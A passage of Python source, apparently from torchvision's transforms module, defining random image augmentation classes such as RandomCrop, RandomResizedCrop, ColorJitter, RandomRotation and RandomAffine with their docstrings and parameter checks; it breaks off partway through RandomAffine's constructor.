self.lambd(img)\n\n def __repr__(self):\n return self.__class__.__name__ + '()'\n\n\nclass RandomTransforms:\n \"\"\"Base class for a list of transformations with randomness\n\n Args:\n transforms (sequence): list of transformations\n \"\"\"\n\n def __init__(self, transforms):\n if not isinstance(transforms, Sequence):\n raise TypeError(\"Argument transforms should be a sequence\")\n self.transforms = transforms\n\n def __call__(self, *args, **kwargs):\n raise NotImplementedError()\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n for t in self.transforms:\n format_string += '\\n'\n format_string += ' {0}'.format(t)\n format_string += '\\n)'\n return format_string\n\n\nclass RandomApply(torch.nn.Module):\n \"\"\"Apply randomly a list of transformations with a given probability.\n\n .. note::\n In order to script the transformation, please use ``torch.nn.ModuleList`` as input instead of list/tuple of\n transforms as shown below:\n\n >>> transforms = transforms.RandomApply(torch.nn.ModuleList([\n >>> transforms.ColorJitter(),\n >>> ]), p=0.3)\n >>> scripted_transforms = torch.jit.script(transforms)\n\n Make sure to use only scriptable transformations, i.e. that work with ``torch.Tensor``, does not require\n `lambda` functions or ``PIL.Image``.\n\n Args:\n transforms (sequence or torch.nn.Module): list of transformations\n p (float): probability\n \"\"\"\n\n def __init__(self, transforms, p=0.5):\n super().__init__()\n self.transforms = transforms\n self.p = p\n\n def forward(self, img):\n if self.p < torch.rand(1):\n return img\n for t in self.transforms:\n img = t(img)\n return img\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n format_string += '\\n p={}'.format(self.p)\n for t in self.transforms:\n format_string += '\\n'\n format_string += ' {0}'.format(t)\n format_string += '\\n)'\n return format_string\n\n\nclass RandomOrder(RandomTransforms):\n \"\"\"Apply a list of transformations in a random order. This transform does not support torchscript.\n \"\"\"\n def __call__(self, img):\n order = list(range(len(self.transforms)))\n random.shuffle(order)\n for i in order:\n img = self.transforms[i](img)\n return img\n\n\nclass RandomChoice(RandomTransforms):\n \"\"\"Apply single transformation randomly picked from a list. This transform does not support torchscript.\n \"\"\"\n def __call__(self, img):\n t = random.choice(self.transforms)\n return t(img)\n\n\nclass RandomCrop(torch.nn.Module):\n \"\"\"Crop the given image at a random location.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions\n\n Args:\n size (sequence or int): Desired output size of the crop. If size is an\n int instead of sequence like (h, w), a square crop (size, size) is\n made. If provided a sequence of length 1, it will be interpreted as (size[0], size[0]).\n padding (int or sequence, optional): Optional padding on each border\n of the image. Default is None. If a single int is provided this\n is used to pad all borders. If sequence of length 2 is provided this is the padding\n on left/right and top/bottom respectively. If a sequence of length 4 is provided\n this is the padding for the left, top, right and bottom borders respectively.\n In torchscript mode padding as single int is not supported, use a sequence of length 1: ``[padding, ]``.\n pad_if_needed (boolean): It will pad the image if smaller than the\n desired size to avoid raising an exception. Since cropping is done\n after padding, the padding seems to be done at a random offset.\n fill (number or str or tuple): Pixel fill value for constant fill. Default is 0. If a tuple of\n length 3, it is used to fill R, G, B channels respectively.\n This value is only used when the padding_mode is constant.\n Only number is supported for torch Tensor.\n Only int or str or tuple value is supported for PIL Image.\n padding_mode (str): Type of padding. Should be: constant, edge, reflect or symmetric. Default is constant.\n\n - constant: pads with a constant value, this value is specified with fill\n\n - edge: pads with the last value on the edge of the image\n\n - reflect: pads with reflection of image (without repeating the last value on the edge)\n\n padding [1, 2, 3, 4] with 2 elements on both sides in reflect mode\n will result in [3, 2, 1, 2, 3, 4, 3, 2]\n\n - symmetric: pads with reflection of image (repeating the last value on the edge)\n\n padding [1, 2, 3, 4] with 2 elements on both sides in symmetric mode\n will result in [2, 1, 1, 2, 3, 4, 4, 3]\n\n \"\"\"\n\n @staticmethod\n def get_params(img: Tensor, output_size: Tuple[int, int]) -> Tuple[int, int, int, int]:\n \"\"\"Get parameters for ``crop`` for a random crop.\n\n Args:\n img (PIL Image or Tensor): Image to be cropped.\n output_size (tuple): Expected output size of the crop.\n\n Returns:\n tuple: params (i, j, h, w) to be passed to ``crop`` for random crop.\n \"\"\"\n w, h = F._get_image_size(img)\n th, tw = output_size\n\n if h + 1 < th or w + 1 < tw:\n raise ValueError(\n \"Required crop size {} is larger then input image size {}\".format((th, tw), (h, w))\n )\n\n if w == tw and h == th:\n return 0, 0, h, w\n\n i = torch.randint(0, h - th + 1, size=(1, )).item()\n j = torch.randint(0, w - tw + 1, size=(1, )).item()\n return i, j, th, tw\n\n def __init__(self, size, padding=None, pad_if_needed=False, fill=0, padding_mode=\"constant\"):\n super().__init__()\n\n self.size = tuple(_setup_size(\n size, error_msg=\"Please provide only two dimensions (h, w) for size.\"\n ))\n\n self.padding = padding\n self.pad_if_needed = pad_if_needed\n self.fill = fill\n self.padding_mode = padding_mode\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be cropped.\n\n Returns:\n PIL Image or Tensor: Cropped image.\n \"\"\"\n if self.padding is not None:\n img = F.pad(img, self.padding, self.fill, self.padding_mode)\n\n width, height = F._get_image_size(img)\n # pad the width if needed\n if self.pad_if_needed and width < self.size[1]:\n padding = [self.size[1] - width, 0]\n img = F.pad(img, padding, self.fill, self.padding_mode)\n # pad the height if needed\n if self.pad_if_needed and height < self.size[0]:\n padding = [0, self.size[0] - height]\n img = F.pad(img, padding, self.fill, self.padding_mode)\n\n i, j, h, w = self.get_params(img, self.size)\n\n return F.crop(img, i, j, h, w)\n\n def __repr__(self):\n return self.__class__.__name__ + \"(size={0}, padding={1})\".format(self.size, self.padding)\n\n\nclass RandomHorizontalFlip(torch.nn.Module):\n \"\"\"Horizontally flip the given image randomly with a given probability.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading\n dimensions\n\n Args:\n p (float): probability of the image being flipped. Default value is 0.5\n \"\"\"\n\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be flipped.\n\n Returns:\n PIL Image or Tensor: Randomly flipped image.\n \"\"\"\n if torch.rand(1) < self.p:\n return F.hflip(img)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={})'.format(self.p)\n\n\nclass RandomVerticalFlip(torch.nn.Module):\n \"\"\"Vertically flip the given image randomly with a given probability.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading\n dimensions\n\n Args:\n p (float): probability of the image being flipped. Default value is 0.5\n \"\"\"\n\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be flipped.\n\n Returns:\n PIL Image or Tensor: Randomly flipped image.\n \"\"\"\n if torch.rand(1) < self.p:\n return F.vflip(img)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={})'.format(self.p)\n\n\nclass RandomPerspective(torch.nn.Module):\n \"\"\"Performs a random perspective transformation of the given image with a given probability.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions.\n\n Args:\n distortion_scale (float): argument to control the degree of distortion and ranges from 0 to 1.\n Default is 0.5.\n p (float): probability of the image being transformed. Default is 0.5.\n interpolation (InterpolationMode): Desired interpolation enum defined by\n :class:`torchvision.transforms.InterpolationMode`. Default is ``InterpolationMode.BILINEAR``.\n If input is Tensor, only ``InterpolationMode.NEAREST``, ``InterpolationMode.BILINEAR`` are supported.\n For backward compatibility integer values (e.g. ``PIL.Image.NEAREST``) are still acceptable.\n fill (sequence or number, optional): Pixel fill value for the area outside the transformed\n image. If given a number, the value is used for all bands respectively.\n If input is PIL Image, the options is only available for ``Pillow>=5.0.0``.\n \"\"\"\n\n def __init__(self, distortion_scale=0.5, p=0.5, interpolation=InterpolationMode.BILINEAR, fill=0):\n super().__init__()\n self.p = p\n\n # Backward compatibility with integer value\n if isinstance(interpolation, int):\n warnings.warn(\n \"Argument interpolation should be of type InterpolationMode instead of int. \"\n \"Please, use InterpolationMode enum.\"\n )\n interpolation = _interpolation_modes_from_int(interpolation)\n\n self.interpolation = interpolation\n self.distortion_scale = distortion_scale\n self.fill = fill\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be Perspectively transformed.\n\n Returns:\n PIL Image or Tensor: Randomly transformed image.\n \"\"\"\n\n fill = self.fill\n if isinstance(img, Tensor):\n if isinstance(fill, (int, float)):\n fill = [float(fill)] * F._get_image_num_channels(img)\n else:\n fill = [float(f) for f in fill]\n\n if torch.rand(1) < self.p:\n width, height = F._get_image_size(img)\n startpoints, endpoints = self.get_params(width, height, self.distortion_scale)\n return F.perspective(img, startpoints, endpoints, self.interpolation, fill)\n return img\n\n @staticmethod\n def get_params(width: int, height: int, distortion_scale: float) -> Tuple[List[List[int]], List[List[int]]]:\n \"\"\"Get parameters for ``perspective`` for a random perspective transform.\n\n Args:\n width (int): width of the image.\n height (int): height of the image.\n distortion_scale (float): argument to control the degree of distortion and ranges from 0 to 1.\n\n Returns:\n List containing [top-left, top-right, bottom-right, bottom-left] of the original image,\n List containing [top-left, top-right, bottom-right, bottom-left] of the transformed image.\n \"\"\"\n half_height = height // 2\n half_width = width // 2\n topleft = [\n int(torch.randint(0, int(distortion_scale * half_width) + 1, size=(1, )).item()),\n int(torch.randint(0, int(distortion_scale * half_height) + 1, size=(1, )).item())\n ]\n topright = [\n int(torch.randint(width - int(distortion_scale * half_width) - 1, width, size=(1, )).item()),\n int(torch.randint(0, int(distortion_scale * half_height) + 1, size=(1, )).item())\n ]\n botright = [\n int(torch.randint(width - int(distortion_scale * half_width) - 1, width, size=(1, )).item()),\n int(torch.randint(height - int(distortion_scale * half_height) - 1, height, size=(1, )).item())\n ]\n botleft = [\n int(torch.randint(0, int(distortion_scale * half_width) + 1, size=(1, )).item()),\n int(torch.randint(height - int(distortion_scale * half_height) - 1, height, size=(1, )).item())\n ]\n startpoints = [[0, 0], [width - 1, 0], [width - 1, height - 1], [0, height - 1]]\n endpoints = [topleft, topright, botright, botleft]\n return startpoints, endpoints\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={})'.format(self.p)\n\n\nclass RandomResizedCrop(torch.nn.Module):\n \"\"\"Crop the given image to random size and aspect ratio.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions\n\n A crop of random size (default: of 0.08 to 1.0) of the original size and a random\n aspect ratio (default: of 3/4 to 4/3) of the original aspect ratio is made. This crop\n is finally resized to given size.\n This is popularly used to train the Inception networks.\n\n Args:\n size (int or sequence): expected output size of each edge. If size is an\n int instead of sequence like (h, w), a square output size ``(size, size)`` is\n made. If provided a sequence of length 1, it will be interpreted as (size[0], size[0]).\n In torchscript mode size as single int is not supported, use a sequence of length 1: ``[size, ]``.\n scale (tuple of float): scale range of the cropped image before resizing, relatively to the origin image.\n ratio (tuple of float): aspect ratio range of the cropped image before resizing.\n interpolation (InterpolationMode): Desired interpolation enum defined by\n :class:`torchvision.transforms.InterpolationMode`. Default is ``InterpolationMode.BILINEAR``.\n If input is Tensor, only ``InterpolationMode.NEAREST``, ``InterpolationMode.BILINEAR`` and\n ``InterpolationMode.BICUBIC`` are supported.\n For backward compatibility integer values (e.g. ``PIL.Image.NEAREST``) are still acceptable.\n\n \"\"\"\n\n def __init__(self, size, scale=(0.08, 1.0), ratio=(3. / 4., 4. / 3.), interpolation=InterpolationMode.BILINEAR):\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n\n if not isinstance(scale, Sequence):\n raise TypeError(\"Scale should be a sequence\")\n if not isinstance(ratio, Sequence):\n raise TypeError(\"Ratio should be a sequence\")\n if (scale[0] > scale[1]) or (ratio[0] > ratio[1]):\n warnings.warn(\"Scale and ratio should be of kind (min, max)\")\n\n # Backward compatibility with integer value\n if isinstance(interpolation, int):\n warnings.warn(\n \"Argument interpolation should be of type InterpolationMode instead of int. \"\n \"Please, use InterpolationMode enum.\"\n )\n interpolation = _interpolation_modes_from_int(interpolation)\n\n self.interpolation = interpolation\n self.scale = scale\n self.ratio = ratio\n\n @staticmethod\n def get_params(\n img: Tensor, scale: List[float], ratio: List[float]\n ) -> Tuple[int, int, int, int]:\n \"\"\"Get parameters for ``crop`` for a random sized crop.\n\n Args:\n img (PIL Image or Tensor): Input image.\n scale (list): range of scale of the origin size cropped\n ratio (list): range of aspect ratio of the origin aspect ratio cropped\n\n Returns:\n tuple: params (i, j, h, w) to be passed to ``crop`` for a random\n sized crop.\n \"\"\"\n width, height = F._get_image_size(img)\n area = height * width\n\n for _ in range(10):\n target_area = area * torch.empty(1).uniform_(scale[0], scale[1]).item()\n log_ratio = torch.log(torch.tensor(ratio))\n aspect_ratio = torch.exp(\n torch.empty(1).uniform_(log_ratio[0], log_ratio[1])\n ).item()\n\n w = int(round(math.sqrt(target_area * aspect_ratio)))\n h = int(round(math.sqrt(target_area / aspect_ratio)))\n\n if 0 < w <= width and 0 < h <= height:\n i = torch.randint(0, height - h + 1, size=(1,)).item()\n j = torch.randint(0, width - w + 1, size=(1,)).item()\n return i, j, h, w\n\n # Fallback to central crop\n in_ratio = float(width) / float(height)\n if in_ratio < min(ratio):\n w = width\n h = int(round(w / min(ratio)))\n elif in_ratio > max(ratio):\n h = height\n w = int(round(h * max(ratio)))\n else: # whole image\n w = width\n h = height\n i = (height - h) // 2\n j = (width - w) // 2\n return i, j, h, w\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be cropped and resized.\n\n Returns:\n PIL Image or Tensor: Randomly cropped and resized image.\n \"\"\"\n i, j, h, w = self.get_params(img, self.scale, self.ratio)\n return F.resized_crop(img, i, j, h, w, self.size, self.interpolation)\n\n def __repr__(self):\n interpolate_str = self.interpolation.value\n format_string = self.__class__.__name__ + '(size={0}'.format(self.size)\n format_string += ', scale={0}'.format(tuple(round(s, 4) for s in self.scale))\n format_string += ', ratio={0}'.format(tuple(round(r, 4) for r in self.ratio))\n format_string += ', interpolation={0})'.format(interpolate_str)\n return format_string\n\n\nclass RandomSizedCrop(RandomResizedCrop):\n \"\"\"\n Note: This transform is deprecated in favor of RandomResizedCrop.\n \"\"\"\n def __init__(self, *args, **kwargs):\n warnings.warn(\"The use of the transforms.RandomSizedCrop transform is deprecated, \" +\n \"please use transforms.RandomResizedCrop instead.\")\n super(RandomSizedCrop, self).__init__(*args, **kwargs)\n\n\nclass FiveCrop(torch.nn.Module):\n \"\"\"Crop the given image into four corners and the central crop.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading\n dimensions\n\n .. Note::\n This transform returns a tuple of images and there may be a mismatch in the number of\n inputs and targets your Dataset returns. See below for an example of how to deal with\n this.\n\n Args:\n size (sequence or int): Desired output size of the crop. If size is an ``int``\n instead of sequence like (h, w), a square crop of size (size, size) is made.\n If provided a sequence of length 1, it will be interpreted as (size[0], size[0]).\n\n Example:\n >>> transform = Compose([\n >>> FiveCrop(size), # this is a list of PIL Images\n >>> Lambda(lambda crops: torch.stack([ToTensor()(crop) for crop in crops])) # returns a 4D tensor\n >>> ])\n >>> #In your test loop you can do the following:\n >>> input, target = batch # input is a 5d tensor, target is 2d\n >>> bs, ncrops, c, h, w = input.size()\n >>> result = model(input.view(-1, c, h, w)) # fuse batch size and ncrops\n >>> result_avg = result.view(bs, ncrops, -1).mean(1) # avg over crops\n \"\"\"\n\n def __init__(self, size):\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be cropped.\n\n Returns:\n tuple of 5 images. Image can be PIL Image or Tensor\n \"\"\"\n return F.five_crop(img, self.size)\n\n def __repr__(self):\n return self.__class__.__name__ + '(size={0})'.format(self.size)\n\n\nclass TenCrop(torch.nn.Module):\n \"\"\"Crop the given image into four corners and the central crop plus the flipped version of\n these (horizontal flipping is used by default).\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading\n dimensions\n\n .. Note::\n This transform returns a tuple of images and there may be a mismatch in the number of\n inputs and targets your Dataset returns. See below for an example of how to deal with\n this.\n\n Args:\n size (sequence or int): Desired output size of the crop. If size is an\n int instead of sequence like (h, w), a square crop (size, size) is\n made. If provided a sequence of length 1, it will be interpreted as (size[0], size[0]).\n vertical_flip (bool): Use vertical flipping instead of horizontal\n\n Example:\n >>> transform = Compose([\n >>> TenCrop(size), # this is a list of PIL Images\n >>> Lambda(lambda crops: torch.stack([ToTensor()(crop) for crop in crops])) # returns a 4D tensor\n >>> ])\n >>> #In your test loop you can do the following:\n >>> input, target = batch # input is a 5d tensor, target is 2d\n >>> bs, ncrops, c, h, w = input.size()\n >>> result = model(input.view(-1, c, h, w)) # fuse batch size and ncrops\n >>> result_avg = result.view(bs, ncrops, -1).mean(1) # avg over crops\n \"\"\"\n\n def __init__(self, size, vertical_flip=False):\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n self.vertical_flip = vertical_flip\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be cropped.\n\n Returns:\n tuple of 10 images. Image can be PIL Image or Tensor\n \"\"\"\n return F.ten_crop(img, self.size, self.vertical_flip)\n\n def __repr__(self):\n return self.__class__.__name__ + '(size={0}, vertical_flip={1})'.format(self.size, self.vertical_flip)\n\n\nclass LinearTransformation(torch.nn.Module):\n \"\"\"Transform a tensor image with a square transformation matrix and a mean_vector computed\n offline.\n This transform does not support PIL Image.\n Given transformation_matrix and mean_vector, will flatten the torch.*Tensor and\n subtract mean_vector from it which is then followed by computing the dot\n product with the transformation matrix and then reshaping the tensor to its\n original shape.\n\n Applications:\n whitening transformation: Suppose X is a column vector zero-centered data.\n Then compute the data covariance matrix [D x D] with torch.mm(X.t(), X),\n perform SVD on this matrix and pass it as transformation_matrix.\n\n Args:\n transformation_matrix (Tensor): tensor [D x D], D = C x H x W\n mean_vector (Tensor): tensor [D], D = C x H x W\n \"\"\"\n\n def __init__(self, transformation_matrix, mean_vector):\n super().__init__()\n if transformation_matrix.size(0) != transformation_matrix.size(1):\n raise ValueError(\"transformation_matrix should be square. Got \" +\n \"[{} x {}] rectangular matrix.\".format(*transformation_matrix.size()))\n\n if mean_vector.size(0) != transformation_matrix.size(0):\n raise ValueError(\"mean_vector should have the same length {}\".format(mean_vector.size(0)) +\n \" as any one of the dimensions of the transformation_matrix [{}]\"\n .format(tuple(transformation_matrix.size())))\n\n if transformation_matrix.device != mean_vector.device:\n raise ValueError(\"Input tensors should be on the same device. Got {} and {}\"\n .format(transformation_matrix.device, mean_vector.device))\n\n self.transformation_matrix = transformation_matrix\n self.mean_vector = mean_vector\n\n def forward(self, tensor: Tensor) -> Tensor:\n \"\"\"\n Args:\n tensor (Tensor): Tensor image to be whitened.\n\n Returns:\n Tensor: Transformed image.\n \"\"\"\n shape = tensor.shape\n n = shape[-3] * shape[-2] * shape[-1]\n if n != self.transformation_matrix.shape[0]:\n raise ValueError(\"Input tensor and transformation matrix have incompatible shape.\" +\n \"[{} x {} x {}] != \".format(shape[-3], shape[-2], shape[-1]) +\n \"{}\".format(self.transformation_matrix.shape[0]))\n\n if tensor.device.type != self.mean_vector.device.type:\n raise ValueError(\"Input tensor should be on the same device as transformation matrix and mean vector. \"\n \"Got {} vs {}\".format(tensor.device, self.mean_vector.device))\n\n flat_tensor = tensor.view(-1, n) - self.mean_vector\n transformed_tensor = torch.mm(flat_tensor, self.transformation_matrix)\n tensor = transformed_tensor.view(shape)\n return tensor\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '(transformation_matrix='\n format_string += (str(self.transformation_matrix.tolist()) + ')')\n format_string += (\", (mean_vector=\" + str(self.mean_vector.tolist()) + ')')\n return format_string\n\n\nclass ColorJitter(torch.nn.Module):\n \"\"\"Randomly change the brightness, contrast, saturation and hue of an image.\n If the image is torch Tensor, it is expected\n to have [..., 3, H, W] shape, where ... means an arbitrary number of leading dimensions.\n If img is PIL Image, mode \"1\", \"L\", \"I\", \"F\" and modes with transparency (alpha channel) are not supported.\n\n Args:\n brightness (float or tuple of float (min, max)): How much to jitter brightness.\n brightness_factor is chosen uniformly from [max(0, 1 - brightness), 1 + brightness]\n or the given [min, max]. Should be non negative numbers.\n contrast (float or tuple of float (min, max)): How much to jitter contrast.\n contrast_factor is chosen uniformly from [max(0, 1 - contrast), 1 + contrast]\n or the given [min, max]. Should be non negative numbers.\n saturation (float or tuple of float (min, max)): How much to jitter saturation.\n saturation_factor is chosen uniformly from [max(0, 1 - saturation), 1 + saturation]\n or the given [min, max]. Should be non negative numbers.\n hue (float or tuple of float (min, max)): How much to jitter hue.\n hue_factor is chosen uniformly from [-hue, hue] or the given [min, max].\n Should have 0<= hue <= 0.5 or -0.5 <= min <= max <= 0.5.\n \"\"\"\n\n def __init__(self, brightness=0, contrast=0, saturation=0, hue=0):\n super().__init__()\n self.brightness = self._check_input(brightness, 'brightness')\n self.contrast = self._check_input(contrast, 'contrast')\n self.saturation = self._check_input(saturation, 'saturation')\n self.hue = self._check_input(hue, 'hue', center=0, bound=(-0.5, 0.5),\n clip_first_on_zero=False)\n\n @torch.jit.unused\n def _check_input(self, value, name, center=1, bound=(0, float('inf')), clip_first_on_zero=True):\n if isinstance(value, numbers.Number):\n if value < 0:\n raise ValueError(\"If {} is a single number, it must be non negative.\".format(name))\n value = [center - float(value), center + float(value)]\n if clip_first_on_zero:\n value[0] = max(value[0], 0.0)\n elif isinstance(value, (tuple, list)) and len(value) == 2:\n if not bound[0] <= value[0] <= value[1] <= bound[1]:\n raise ValueError(\"{} values should be between {}\".format(name, bound))\n else:\n raise TypeError(\"{} should be a single number or a list/tuple with lenght 2.\".format(name))\n\n # if value is 0 or (1., 1.) for brightness/contrast/saturation\n # or (0., 0.) for hue, do nothing\n if value[0] == value[1] == center:\n value = None\n return value\n\n @staticmethod\n def get_params(brightness: Optional[List[float]],\n contrast: Optional[List[float]],\n saturation: Optional[List[float]],\n hue: Optional[List[float]]\n ) -> Tuple[Tensor, Optional[float], Optional[float], Optional[float], Optional[float]]:\n \"\"\"Get the parameters for the randomized transform to be applied on image.\n\n Args:\n brightness (tuple of float (min, max), optional): The range from which the brightness_factor is chosen\n uniformly. Pass None to turn off the transformation.\n contrast (tuple of float (min, max), optional): The range from which the contrast_factor is chosen\n uniformly. Pass None to turn off the transformation.\n saturation (tuple of float (min, max), optional): The range from which the saturation_factor is chosen\n uniformly. Pass None to turn off the transformation.\n hue (tuple of float (min, max), optional): The range from which the hue_factor is chosen uniformly.\n Pass None to turn off the transformation.\n\n Returns:\n tuple: The parameters used to apply the randomized transform\n along with their random order.\n \"\"\"\n fn_idx = torch.randperm(4)\n\n b = None if brightness is None else float(torch.empty(1).uniform_(brightness[0], brightness[1]))\n c = None if contrast is None else float(torch.empty(1).uniform_(contrast[0], contrast[1]))\n s = None if saturation is None else float(torch.empty(1).uniform_(saturation[0], saturation[1]))\n h = None if hue is None else float(torch.empty(1).uniform_(hue[0], hue[1]))\n\n return fn_idx, b, c, s, h\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Input image.\n\n Returns:\n PIL Image or Tensor: Color jittered image.\n \"\"\"\n fn_idx, brightness_factor, contrast_factor, saturation_factor, hue_factor = \\\n self.get_params(self.brightness, self.contrast, self.saturation, self.hue)\n\n for fn_id in fn_idx:\n if fn_id == 0 and brightness_factor is not None:\n img = F.adjust_brightness(img, brightness_factor)\n elif fn_id == 1 and contrast_factor is not None:\n img = F.adjust_contrast(img, contrast_factor)\n elif fn_id == 2 and saturation_factor is not None:\n img = F.adjust_saturation(img, saturation_factor)\n elif fn_id == 3 and hue_factor is not None:\n img = F.adjust_hue(img, hue_factor)\n\n return img\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n format_string += 'brightness={0}'.format(self.brightness)\n format_string += ', contrast={0}'.format(self.contrast)\n format_string += ', saturation={0}'.format(self.saturation)\n format_string += ', hue={0})'.format(self.hue)\n return format_string\n\n\nclass RandomRotation(torch.nn.Module):\n \"\"\"Rotate the image by angle.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions.\n\n Args:\n degrees (sequence or number): Range of degrees to select from.\n If degrees is a number instead of sequence like (min, max), the range of degrees\n will be (-degrees, +degrees).\n interpolation (InterpolationMode): Desired interpolation enum defined by\n :class:`torchvision.transforms.InterpolationMode`. Default is ``InterpolationMode.NEAREST``.\n If input is Tensor, only ``InterpolationMode.NEAREST``, ``InterpolationMode.BILINEAR`` are supported.\n For backward compatibility integer values (e.g. ``PIL.Image.NEAREST``) are still acceptable.\n expand (bool, optional): Optional expansion flag.\n If true, expands the output to make it large enough to hold the entire rotated image.\n If false or omitted, make the output image the same size as the input image.\n Note that the expand flag assumes rotation around the center and no translation.\n center (sequence, optional): Optional center of rotation, (x, y). Origin is the upper left corner.\n Default is the center of the image.\n fill (sequence or number, optional): Pixel fill value for the area outside the rotated\n image. If given a number, the value is used for all bands respectively.\n If input is PIL Image, the options is only available for ``Pillow>=5.2.0``.\n resample (int, optional): deprecated argument and will be removed since v0.10.0.\n Please use `arg`:interpolation: instead.\n\n .. _filters: https://pillow.readthedocs.io/en/latest/handbook/concepts.html#filters\n\n \"\"\"\n\n def __init__(\n self, degrees, interpolation=InterpolationMode.NEAREST, expand=False, center=None, fill=None, resample=None\n ):\n super().__init__()\n if resample is not None:\n warnings.warn(\n \"Argument resample is deprecated and will be removed since v0.10.0. Please, use interpolation instead\"\n )\n interpolation = _interpolation_modes_from_int(resample)\n\n # Backward compatibility with integer value\n if isinstance(interpolation, int):\n warnings.warn(\n \"Argument interpolation should be of type InterpolationMode instead of int. \"\n \"Please, use InterpolationMode enum.\"\n )\n interpolation = _interpolation_modes_from_int(interpolation)\n\n self.degrees = _setup_angle(degrees, name=\"degrees\", req_sizes=(2, ))\n\n if center is not None:\n _check_sequence_input(center, \"center\", req_sizes=(2, ))\n\n self.center = center\n\n self.resample = self.interpolation = interpolation\n self.expand = expand\n self.fill = fill\n\n @staticmethod\n def get_params(degrees: List[float]) -> float:\n \"\"\"Get parameters for ``rotate`` for a random rotation.\n\n Returns:\n float: angle parameter to be passed to ``rotate`` for random rotation.\n \"\"\"\n angle = float(torch.empty(1).uniform_(float(degrees[0]), float(degrees[1])).item())\n return angle\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be rotated.\n\n Returns:\n PIL Image or Tensor: Rotated image.\n \"\"\"\n fill = self.fill\n if isinstance(img, Tensor):\n if isinstance(fill, (int, float)):\n fill = [float(fill)] * F._get_image_num_channels(img)\n else:\n fill = [float(f) for f in fill]\n angle = self.get_params(self.degrees)\n\n return F.rotate(img, angle, self.resample, self.expand, self.center, fill)\n\n def __repr__(self):\n interpolate_str = self.interpolation.value\n format_string = self.__class__.__name__ + '(degrees={0}'.format(self.degrees)\n format_string += ', interpolation={0}'.format(interpolate_str)\n format_string += ', expand={0}'.format(self.expand)\n if self.center is not None:\n format_string += ', center={0}'.format(self.center)\n if self.fill is not None:\n format_string += ', fill={0}'.format(self.fill)\n format_string += ')'\n return format_string\n\n\nclass RandomAffine(torch.nn.Module):\n \"\"\"Random affine transformation of the image keeping center invariant.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions.\n\n Args:\n degrees (sequence or number): Range of degrees to select from.\n If degrees is a number instead of sequence like (min, max), the range of degrees\n will be (-degrees, +degrees). Set to 0 to deactivate rotations.\n translate (tuple, optional): tuple of maximum absolute fraction for horizontal\n and vertical translations. For example translate=(a, b), then horizontal shift\n is randomly sampled in the range -img_width * a < dx < img_width * a and vertical shift is\n randomly sampled in the range -img_height * b < dy < img_height * b. Will not translate by default.\n scale (tuple, optional): scaling factor interval, e.g (a, b), then scale is\n randomly sampled from the range a <= scale <= b. Will keep original scale by default.\n shear (sequence or number, optional): Range of degrees to select from.\n If shear is a number, a shear parallel to the x axis in the range (-shear, +shear)\n will be applied. Else if shear is a sequence of 2 values a shear parallel to the x axis in the\n range (shear[0], shear[1]) will be applied. Else if shear is a sequence of 4 values,\n a x-axis shear in (shear[0], shear[1]) and y-axis shear in (shear[2], shear[3]) will be applied.\n Will not apply shear by default.\n interpolation (InterpolationMode): Desired interpolation enum defined by\n :class:`torchvision.transforms.InterpolationMode`. Default is ``InterpolationMode.NEAREST``.\n If input is Tensor, only ``InterpolationMode.NEAREST``, ``InterpolationMode.BILINEAR`` are supported.\n For backward compatibility integer values (e.g. ``PIL.Image.NEAREST``) are still acceptable.\n fill (sequence or number, optional): Pixel fill value for the area outside the transformed\n image. If given a number, the value is used for all bands respectively.\n If input is PIL Image, the options is only available for ``Pillow>=5.0.0``.\n fillcolor (sequence or number, optional): deprecated argument and will be removed since v0.10.0.\n Please use `arg`:fill: instead.\n resample (int, optional): deprecated argument and will be removed since v0.10.0.\n Please use `arg`:interpolation: instead.\n\n .. _filters: https://pillow.readthedocs.io/en/latest/handbook/concepts.html#filters\n\n \"\"\"\n\n def __init__(\n self, degrees, translate=None, scale=None, shear=None, interpolation=InterpolationMode.NEAREST, fill=0,\n fillcolor=None, resample=None\n ):\n super().__init__()\n if resample is not None:\n warnings.warn(\n \"Argument resample is deprecated and will be removed since v0.10.0. Please, use interpolation instead\"\n )\n interpolation = _interpolation_modes_from_int(resample)\n\n # Backward compatibility with integer value\n if isinstance(interpolation, int):\n warnings.warn(\n \"Argument interpolation should be of type InterpolationMode instead of int. \"\n \"Please, use InterpolationMode enum.\"\n )\n interpolation = _interpolation_modes_from_int(interpolation)\n\n if fillcolor is not None:\n warnings.warn(\n 